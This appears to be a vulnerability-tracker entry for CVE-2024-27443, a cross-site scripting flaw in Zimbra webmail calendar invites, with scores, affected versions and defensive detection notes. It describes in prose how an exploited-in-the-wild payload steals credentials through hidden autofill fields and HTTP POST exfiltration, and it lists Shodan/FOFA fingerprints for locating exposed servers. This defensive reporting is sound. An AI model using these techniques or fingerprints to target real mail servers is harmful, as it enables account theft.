cbcvebase.
CVE-2024-27443
published 2024-08-12

CVE-2024-27443: An issue was discovered in Zimbra Collaboration (ZCS) 9.0 and 10.0. A Cross-Site Scripting (XSS) vulnerability exists in the CalendarInvite feature of the…

PriorityP278medium6.1CVSS 3.1
AVNACLPRNUIRSCCLILAN
KEVITWEXPLOIT
CISA Known Exploited Vulnerabilitydue 2025-06-09
Exploited in the wild
EPSS
19.54%
97.0th percentile
An issue was discovered in Zimbra Collaboration (ZCS) 9.0 and 10.0. A Cross-Site Scripting (XSS) vulnerability exists in the CalendarInvite feature of the Zimbra webmail classic user interface, because of improper input validation in the handling of the calendar header. An attacker can exploit this via an email message containing a crafted calendar header with an embedded XSS payload. When a victim views this message in the Zimbra webmail classic interface, the payload is executed in the context of the victim's session, potentially leading to execution of arbitrary JavaScript code.

Affected

2 ranges
VendorProductVersion rangeFixed in
zimbracollaboration
zimbracollaboration>= 10.0.0 < 10.0.710.0.7

Detection & IOCsextracted from sources · hover to see the quote

path/js/zimbraMail/share/model/ZmSettings.js
otherX-Zimbra-Calendar-Intended-For (header used for XSS injection)
  • Detect exploitation attempts by monitoring for crafted calendar invite emails containing the X-Zimbra-Calendar-Intended-For header with embedded JavaScript (including base64-encoded payloads), as APT28 embedded a hidden script that decoded and executed base64 JavaScript when the invite was viewed.
  • Look for HTTP POST requests from Zimbra webmail sessions to hardcoded external C2 addresses — the malicious payload exfiltrates credentials, contacts, webmail settings, login history, 2FA data, and passwords via HTTP POST.
  • Detect invisible input fields injected into the Zimbra webmail DOM — the payload creates invisible input fields to trick browsers or password managers into autofilling stored credentials.
  • Use Shodan/FOFA fingerprints to identify exposed vulnerable Zimbra instances: favicon hashes 1624375939 and 475145467, and HTML body containing 'zimbra collaboration suite web client'.
  • Flag Zimbra Collaboration versions 9.0.0 (before P39) and >= 10.0.0 < 10.0.7 as vulnerable; version can be extracted from /js/zimbraMail/share/model/ZmSettings.js via the CLIENT_VERSION field.
  • The payload executes solely upon opening the malicious email — no clicks, redirections, or user input required — so email gateway inspection of calendar invite headers is critical for early detection.
  • The payload has no persistence — it only executes when the malicious email is opened, so forensic investigation should focus on email open events and associated outbound HTTP POST activity rather than persistent artifacts.
  • ·The Nuclei template detection method is passive/version-based only (checks ZmSettings.js for version string) and does not actively confirm XSS exploitability — it will flag any unpatched instance regardless of actual attack traffic.
  • ·Each malicious script has a slightly different set of capabilities adjusted per target product, meaning C2 addresses and payload structure will vary per campaign instance and cannot be universally fingerprinted from public reporting alone.
  • ·Affected versions span three patch branches: 8.8.15 (before P46), 9.0.0 (before P39), and 10.x (before 10.0.7) — detection rules scoped only to 9.x/10.x will miss 8.8.15 deployments.

CVSS provenance

nvdv3.16.1MEDIUMCVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
vulncheck6.1MEDIUM
cisa6.1MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.